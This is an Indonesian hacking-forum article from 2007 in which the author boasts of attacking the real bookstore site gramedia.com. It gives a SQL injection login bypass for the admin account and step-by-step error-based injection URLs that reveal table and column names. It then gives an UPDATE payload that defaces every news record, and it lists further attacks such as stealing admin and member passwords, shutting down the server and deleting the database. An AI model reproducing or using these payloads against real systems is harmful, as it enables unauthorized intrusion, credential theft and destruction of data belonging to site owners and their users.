Beli Buku Gratis Apa Diface Yach????(SQL-Injection bug in gramedia) By. 4L13N

Date 2007/6/6 23:17:31 | Topic: Hacking/Cracking

Sebelumnya Gw minta maaf Ama www.gramedia.com
NB: Gw Cuma Anak Ingusan Yang slalu ingin tau jadi buat yang udeh master lewatin aja oke!!!!


Sabtu 2-juni-2007 jam 10 malem Iseng-iseng gw surfing ke situs www.gramedia.com niatnya sey liat-liat buku
tiba-tiba ada setan yang bisikin "woi coba dong neh situs" iya coba-coba ga bayar kan????
ya udeh gw klik halaman member truz gw coba pake SQL_Injection dengan
username: admin Password: 'or ''='
wah gileee bisa masuk, gak nyangka situs sekelas gramedia masih kena ama bug's kaya gini,
dalem hati gw ngomong "woii admin Why???hehe33x bisa beli buku gratis neyyy" kaga' ah, gw ga' mw jadi kriminal, logout aja ah!!!
lagi-lagi, setan keparat bisikin "Udeh deface tuh situs!!!!" ehmm gimana ya?? udeh kepalang tanggung!!
pake cara apa ya, yang enak???Oiya, Update database server aja ahh!!! saatnya mencari informasi, gw buka:
http://www.gramedia.com/detil_newsevent.asp?id=061110102137

buat nyari error gw tambahin tanda kutip satu dielakang jadinya kaya gini:
http://www.gramedia.com/detil_newsevent.asp?id=061110102137'

wahhh ada, errornya!!!
inject ahh buat nyari nama tabel n colomnya pake perintah 'Having 1=1--
http://www.gramedia.com/detil_newsevent.asp?id=061110102137'Having 1=1--
kluar error deh :

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'td_newsevent.NEWSEVENT_ID' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

wahh udaeh dapet nama tabel n kolum pertamanya "td_newsevent nama tabel n NEWSEVENT_ID nama kolum" terusin ahh!!!
untuk tau kolum berikutnya gw pake perintah 'Group+by+kolum_name(NEWSEVENT_ID)
http://www.gramedia.com/detil_newsevent.asp?id=061110102137%20'group%20by%20td_newsevent.NEWSEVENT_ID--
Error_Nya :
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'td_newsevent.JUDUL' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

Udeh dapet ney kolum JUDUL looping lagi ahh!!!
http://www.gramedia.com/detil_newsevent.asp?id=061110102137%20'group%20by%20td_newsevent.NEWSEVENT_ID,JUDUL--

Error_Nya :
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'td_newsevent.PENULIS' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
Wahh kali ini kolum PENULIS gw looping lagi

http://www.gramedia.com/detil_newsevent.asp?id=061110102137%20'group%20by%20td_newsevent.NEWSEVENT_ID,JUDUL,PENULIS--
truz errornya:
udeh ya gw cape ngetiknya pokoknya nama kolum-kolumnya ini:
NEWSEVENT_ID
JUDUL
PENULIS
SUMMARY
DESCRIPTION
STATUS

Wawwww Informasinya udeh cukup neyyy.... deface-deface
tiba saatnya untuk menginjeksi database_nya disini gw pake perintah 'Update+nama_tabel+set+nama_kolum='pesan';--
jadinya kaya gini:

http://www.gramedia.com/detil_newsevent.asp?id=061110102137%20'update+td_newsevent+set+DESCRIPTION="

<"font%20color=red><"marquee>4L13N%20FOUND%20BUG%20PLEASE%20PATCH%20YOUR%20SYSTEM

';--

Kok lw gak pake perintah where sich??? Wah Gw terlalu malas untuk itu, lagian biar semua colum DESCRIPTION yang ada di tabel td_newsevent ikut ter_Update semuanya Hehe33x!!
Nah ini dia hasilnye....:

GAMBARNYA aku kasih juga ya bang aat...

Gramedia toko buku paling populer se-Indonesia ternyata mempunyai situs yang bisa dibilang amat sangat rentan dari serangan hacker bahkan bocah ingusan yang ga' tau apa-apa kaya gw juga bisa!!!!>>-A
Apa cuma itu yang bisa kita laku'in tentu TIDAAAAKKK!!!!
kalo ditelusuri lagi kita bisa :
-Menambahkan isi database_Nya....pake perintah 'Insert
-mematikan Sql server....pake perintah ;shutdown
-mencari username admin n passwordnya... pake perintah union+select ato convert
-mencari username member n passwordnya
-deface satu halaman ato mungkin Nge_Remote
-mendelete database
-masih banyak lagi dahhhh cape neyy dah malem



Kritik,Saran,Cacian n Makian mail To here_4l13n@yahoo.com
kalo pujian kirim ke_ ALLAH SWT N Rosul2xnya

4L13N Special's Thank's:
ALLAH SWT N Rosul2xnya beserta keluarga dan sahabatnya
AwN24 You Are My Inspiration
Jarul_Kidi3 Jangan berenti ngebimbing gw oke!!!
GiberWay_Community N Gondrong's_Community
Ube,Bimo,Delly,Ferdy,dll You are is my Best Friend's
n semua virologers

Buat Bang Aat :
Semoga virologi kaga' kaya situs2x laen yang menjadikan situsnya buat promosi!!!
BRAVO INDONESIA

Salam Hangat By. 4L13N



This article comes from virologi.info
http://virologi.info/virologist

The URL for this story is:
http://virologi.info/virologist/article.php?storyid=179